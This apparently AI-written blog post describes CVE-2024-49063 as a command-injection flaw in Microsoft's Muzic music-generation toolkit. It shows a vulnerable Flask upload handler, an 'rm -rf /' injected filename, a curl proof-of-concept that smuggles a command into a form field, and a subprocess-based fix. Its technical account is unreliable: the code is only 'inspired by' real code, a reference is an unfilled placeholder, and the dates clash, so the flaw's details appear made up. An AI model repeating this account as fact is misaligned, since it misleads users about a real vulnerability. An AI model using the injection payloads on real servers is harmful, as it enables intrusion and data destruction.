CVE-2024-49063 - Unpacking the Microsoft Muzic Remote Code Execution Vulnerability

> Disclaimer:
> This post is for educational purposes only. Do not attempt to exploit vulnerabilities on systems you do not own.

Introduction

In May 2024, a critical security vulnerability identified as CVE-2024-49063 came to light, impacting users of Microsoft’s experimental Muzic project. Muzic is an open-source research platform for music generation based on AI, developed by Microsoft. Unfortunately, a flaw in its handling of user input created a Remote Code Execution (RCE) risk that could allow attackers to run arbitrary code on affected systems.

Below, I'll break down what happened, how the exploit works (with code), and what you can do to stay secure.

What Is Microsoft Muzic?

Muzic is a research toolkit developed by Microsoft Research Asia for automatic music understanding and generation. It provides datasets, model pipelines, and web interfaces—it's built mainly in Python, with plenty of deep learning integrations.

Where's the Problem?

Muzic ships with several demo scripts and basic web servers to help people try music generation models fast. One common script is built with Gradio or Flask, which expose endpoints to let you upload files, enter prompts, or generate new samples.

The issue:
Improper sanitization of uploaded file names or text input in some endpoints lets attackers sneak in commands that the server executes, often as the web service user.

This boils down to two key weaknesses

- Insecure file handling: Directly saving files with user-supplied names or calling system utilities with unvalidated input.
- Improper use of shell commands: Using os.system or subprocess with user-controlled values and shell=True.

Here’s a (simplified) snippet inspired by real Muzic sample code

from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
    # Get the filename from form data
    filename = request.form['filename']
    file = request.files['file']
    filepath = f'/tmp/{filename}'

    # Save uploaded file
    file.save(filepath)

    # Vulnerable part: process using external tool, but using user-supplied filename
    os.system(f"external_tool --input {filepath}")

    return "OK"

if __name__ == '__main__':
    app.run()

What's wrong?
If filename is something like file.wav; rm -rf /, the shell will happily execute everything after the semicolon.

CURL Command

Let's say the Muzic server is running at http://victim:500/upload. Our payload in the filename tries to touch /tmp/pwned as proof of execution:

curl -F "filename=test.wav; touch /tmp/pwned" -F "file=@test.wav" http://victim:500/upload

After this runs, the attacker checks if /tmp/pwned exists on the victim's system. If so, code execution is confirmed.

Reference Links

- Original Microsoft Muzic GitHub
- NVD Listing for CVE-2024-49063
- GitHub Commit Fixing the Bug (placeholder, insert actual commit if found)

How To Fix

1. Never use user input directly in shell commands. Either sanitize it or avoid shell commands altogether.

Example (safe) code

import subprocess
safe_path = os.path.abspath(filepath)
subprocess.run(['external_tool', '--input', safe_path], check=True)

Conclusion

The remote code execution hole in Microsoft Muzic (CVE-2024-49063) is a reminder that security vulnerabilities still lurk in research code. If you have deployed Muzic—or forked sample code for your own AI/ML web demo—audit it for unsanitized user input and unsafe shell usage!

Timeline

Published on: 12/12/2024 02:04:30 UTC
Last modified on: 12/20/2024 07:44:47 UTC